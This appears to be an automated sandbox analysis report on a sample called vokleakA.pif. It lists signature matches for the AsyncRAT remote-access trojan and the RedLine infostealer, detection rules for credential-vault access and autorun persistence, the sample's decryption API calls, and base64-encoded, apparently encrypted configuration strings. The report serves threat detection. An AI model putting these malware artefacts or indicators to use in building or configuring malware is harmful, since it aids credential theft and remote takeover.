Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, v9Lsz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, VFo.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 5FJ0H20tobu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, NtdoTGO.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, XBsYgp.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, AwxUa2Na.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 19C9FfZ.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 19C9FfZ.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, soCD8XkwU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, soCD8XkwU.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, Settings.cs	Base64 encoded string: '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', 